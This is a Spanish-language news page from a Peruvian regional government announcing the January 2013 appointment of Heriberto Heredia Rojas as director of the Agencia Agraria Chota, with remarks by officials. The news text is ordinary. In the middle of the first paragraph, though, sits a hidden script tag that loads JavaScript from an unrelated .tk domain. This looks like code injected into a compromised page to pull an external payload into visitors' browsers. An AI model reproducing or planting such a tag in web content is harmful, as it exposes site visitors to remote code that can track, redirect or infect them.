Ingresar

Designan nuevo Director de la Agencia Agraria Chota

Miércoles, 16 Enero, 2013 - 11:42
Esta mañana se realizó asunción de cargo con la presencia del Gerente Sub Regional y Directores Sectoriales.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Por: Carlos J. Idrogo Bravo

Esta mañana asumió la Dirección del Sector Agricultura, el Médico Veterinario Heriberto Heredia Rojas, en mérito a la Resolución Directoral Regional Nº 007-2013-GR.CAJ/DRA, rubricada por el Director Regional de Agricultura, Ing. Abner Ruben Romero Vásquez, resolviendo su designación como Director de Programa Sectorial II – Director de la Agencia Agraria Chota, a partir del 10 de enero del 2013. A través de la mencionada resolución también se expresa el agradecimiento al Ing. Oscar Bernal Rubio, por la labor desarrollada durante el tiempo que duró su designación en dicho cargo.

El Director saliente hizo un breve recuento de su gestión y agradeció la confianza depositada en su persona por las autoridades regionales así como el valioso apoyo del personal de esa entidad durante el ejercicio de su función.
El Gerente Sub Regional, Soc. Carlos M. Roncal Noriega, antes de dar posesión de cargo al flamante funcionario, reveló que este año hay muy buenas noticias para este sector; según lo dispuesto por el Presidente Regional, Prof. Gregorio Santos Guerrero, se pondrá en marcha el plan orientado a mejorar las capacidades de las 13 Agencias Agrarias que funcionan en la Región Cajamarca, con más de 10 millones de soles.

Ello significa un reconociendo del Gobierno Regional pues si no fortalecemos a las Agencias Agrarias no podemos exigirles que respondan a las innumerables funciones de su competencia; ese mejoramiento implica más capacitación, mayor implementación, etc. Se vienen importantes proyectos de riego a nivel regional donde Chota también esta incluida, El Sector Agrario tiene que despuntarse, subrayo el funcionario Subregional.

Por su parte, el nuevo Director de la Agencia Agraria Chota, expresó su compromiso de trabajo, anunciando una continua coordinación con los funcionarios sectoriales para afrontar la problemática de nuestra agricultura que es de subsistencia. Trabajaremos fuertemente en este tema, vamos a salir adelante, visitaremos las comunidades, organizando a nuestros campesinos y trabajando directamente con ellos, enfatizó. Heredia Rojas agradeció a los trabajadores manifestándoles que analizará la problemática para juntos darle la mejor solución. Tenemos un gran desafío y no nos queda más que afrontarlo, concluyó.

AdjuntoTamaño
PDF icon Descargar198.16 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen